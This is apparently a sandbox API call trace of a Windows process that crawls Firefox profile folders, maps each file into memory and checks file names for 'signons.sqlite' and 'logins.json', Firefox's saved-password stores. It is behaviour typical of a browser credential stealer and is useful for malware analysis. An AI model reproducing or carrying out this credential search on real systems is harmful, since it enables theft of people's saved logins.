(lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.445] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5d7c90 [0589.445] lstrlenW (lpString="weave") returned 5 [0589.445] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.445] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x5500d0 [0589.445] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.445] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.445] lstrlenW (lpString="\\*.*") returned 4 [0589.445] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.445] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5d7c90 [0589.445] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0x57ca60 [0589.446] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.446] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0589.446] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.446] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.446] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0589.446] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0589.446] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.446] lstrlenW (lpString="\\") returned 1 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.446] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x578c38 [0589.446] lstrlenW (lpString="changes") returned 7 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.446] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5e1d10 [0589.446] LocalFree (hMem=0x578c38) returned 0x0 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0589.446] lstrlenW (lpString="\\*.*") returned 4 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0589.446] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0589.446] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 0x57c9a0 [0589.446] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.446] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 1 [0589.446] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.446] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.446] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 0 [0589.446] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0589.446] LocalFree (hMem=0x56afc8) returned 0x0 [0589.446] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.446] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0589.446] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0589.446] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.446] lstrlenW (lpString="\\") returned 1 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.446] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x578c38 [0589.446] lstrlenW (lpString="failed") returned 6 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.446] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x5e1d10 [0589.446] LocalFree (hMem=0x578c38) returned 0x0 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0589.446] lstrlenW (lpString="\\*.*") returned 4 [0589.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0589.446] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0589.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 0x57c9a0 [0589.447] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.447] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 1 [0589.447] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.447] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.447] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 0 [0589.447] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0589.447] LocalFree (hMem=0x56afc8) returned 0x0 [0589.447] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.447] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0589.447] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0589.447] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0589.447] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.447] lstrlenW (lpString="\\") returned 1 [0589.447] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.447] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x578c38 [0589.447] lstrlenW (lpString="toFetch") returned 7 [0589.447] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.447] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5e1d10 [0589.447] LocalFree (hMem=0x578c38) returned 0x0 [0589.447] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0589.447] lstrlenW (lpString="\\*.*") returned 4 [0589.447] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0589.447] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0589.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 0x57c9a0 [0589.447] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.447] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 1 [0589.447] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.447] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.447] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 0 [0589.447] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0589.447] LocalFree (hMem=0x56afc8) returned 0x0 [0589.447] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.447] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0 [0589.447] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.448] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.448] LocalFree (hMem=0x5500d0) returned 0x0 [0589.448] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0589.448] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0589.448] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0589.448] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.448] lstrlenW (lpString="\\") returned 1 [0589.448] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.448] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5d7c90 [0589.448] lstrlenW (lpString="webapps") returned 7 [0589.448] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.448] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5500d0 [0589.448] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.448] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.448] lstrlenW (lpString="\\*.*") returned 4 [0589.448] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.448] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5d7c90 [0589.448] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0x57ca60 [0589.448] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.448] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0589.448] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.448] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.448] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0589.448] lstrlenW (lpString="\\") returned 1 [0589.448] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.448] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x578c38 [0589.448] lstrlenW (lpString="webapps.json") returned 12 [0589.448] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0589.448] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e1d10 [0589.448] LocalFree (hMem=0x578c38) returned 0x0 [0589.448] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.449] CloseHandle (hObject=0x660) returned 1 [0589.449] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0589.449] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x578c38 [0589.449] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x578c38, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json") returned 0x61 [0589.449] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.449] CloseHandle (hObject=0x660) returned 1 [0589.449] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.449] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2 [0589.449] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.449] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.450] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c4a0 [0589.450] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.450] CloseHandle (hObject=0x668) returned 1 [0589.450] CloseHandle (hObject=0x660) returned 1 [0589.450] LocalFree (hMem=0x578c38) returned 0x0 [0589.450] StrStrIW (lpFirst="webapps.json", lpSrch="signons.sqlite") returned 0x0 [0589.450] StrStrIW (lpFirst="webapps.json", lpSrch="logins.json") returned 0x0 [0589.450] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.450] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0 [0589.450] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.450] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.450] LocalFree (hMem=0x5500d0) returned 0x0 [0589.450] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0589.450] lstrlenW (lpString="\\") returned 1 [0589.450] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.450] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5d7c90 [0589.450] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0589.450] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.450] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0589.450] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.450] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.450] CloseHandle (hObject=0x4c8) returned 1 [0589.450] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0589.450] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.450] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x56c300, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite") returned 0x60 [0589.451] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.451] CloseHandle (hObject=0x4c8) returned 1 [0589.451] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.451] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0589.451] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0589.451] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.462] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c530 [0589.462] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.462] CloseHandle (hObject=0x660) returned 1 [0589.462] CloseHandle (hObject=0x4c8) returned 1 [0589.462] LocalFree (hMem=0x56c300) returned 0x0 [0589.462] StrStrIW (lpFirst="webappsstore.sqlite", lpSrch="signons.sqlite") returned 0x0 [0589.462] StrStrIW (lpFirst="webappsstore.sqlite", lpSrch="logins.json") returned 0x0 [0589.462] LocalFree (hMem=0x56afc8) returned 0x0 [0589.462] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 0 [0589.462] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0589.463] LocalFree (hMem=0x578b10) returned 0x0 [0589.463] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.463] lstrlenW (lpString="Profile0") returned 8 [0589.463] LocalFree (hMem=0x2ed9848) returned 0x0 [0589.463] LocalFree (hMem=0x5ec290) returned 0x0 [0589.464] LocalFree (hMem=0x5a1300) returned 0x0 [0589.464] LocalFree (hMem=0x2ed3050) returned 0x0 [0589.464] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.464] lstrlenW (lpString="*.*") returned 3 [0589.464] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.464] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d7c90 [0589.464] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*", lpFindFileData=0x52dfc8 | out: lpFindFileData=0x52dfc8) returned 0x57d1e0 [0589.464] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.464] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc8 | out: lpFindFileData=0x52dfc8) returned 1 [0589.464] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.464] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.464] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc8 | out: lpFindFileData=0x52dfc8) returned 1 [0589.464] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0589.464] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0589.464] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.464] lstrlenW (lpString="") returned 0 [0589.464] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.464] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed3050 [0589.464] lstrlenW (lpString="Crash Reports") returned 13 [0589.464] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.464] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5a1300 [0589.464] LocalFree (hMem=0x2ed3050) returned 0x0 [0589.464] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0589.464] lstrlenW (lpString="\\*.*") returned 4 [0589.464] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0589.464] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d0c00 [0589.464] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*", lpFindFileData=0x52dd50 | out: lpFindFileData=0x52dd50) returned 0x57ca60 [0589.465] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.465] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd50 | out: lpFindFileData=0x52dd50) returned 1 [0589.465] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.465] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.465] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd50 | out: lpFindFileData=0x52dd50) returned 1 [0589.465] lstrlenW (lpString="\\") returned 1 [0589.465] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0589.465] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0d18 [0589.465] lstrlenW (lpString="InstallTime20131025151332") returned 25 [0589.465] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 64 [0589.465] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5500d0 [0589.465] LocalFree (hMem=0x5d0d18) returned 0x0 [0589.465] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.465] CloseHandle (hObject=0x660) returned 1 [0589.465] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.465] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.465] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpDst=0x56afc8, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 0x5a [0589.465] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.465] CloseHandle (hObject=0x660) returned 1 [0589.465] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.466] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa [0589.466] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.466] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.466] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c5c0 [0589.466] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.467] CloseHandle (hObject=0x668) returned 1 [0589.467] CloseHandle (hObject=0x660) returned 1 [0589.467] LocalFree (hMem=0x56afc8) returned 0x0 [0589.467] StrStrIW (lpFirst="InstallTime20131025151332", lpSrch="signons.sqlite") returned 0x0 [0589.467] StrStrIW (lpFirst="InstallTime20131025151332", lpSrch="logins.json") returned 0x0 [0589.467] LocalFree (hMem=0x5500d0) returned 0x0 [0589.467] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd50 | out: lpFindFileData=0x52dd50) returned 0 [0589.467] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.467] LocalFree (hMem=0x5d0c00) returned 0x0 [0589.467] LocalFree (hMem=0x5a1300) returned 0x0 [0589.467] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc8 | out: lpFindFileData=0x52dfc8) returned 1 [0589.467] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0589.467] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0589.467] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.467] lstrlenW (lpString="") returned 0 [0589.467] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.467] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed3050 [0589.467] lstrlenW (lpString="Profiles") returned 8 [0589.467] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.467] LocalAlloc (uFlags=0x40, uBytes=0xf6) returned 0x5a1300 [0589.467] LocalFree (hMem=0x2ed3050) returned 0x0 [0589.467] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0589.467] lstrlenW (lpString="\\*.*") returned 4 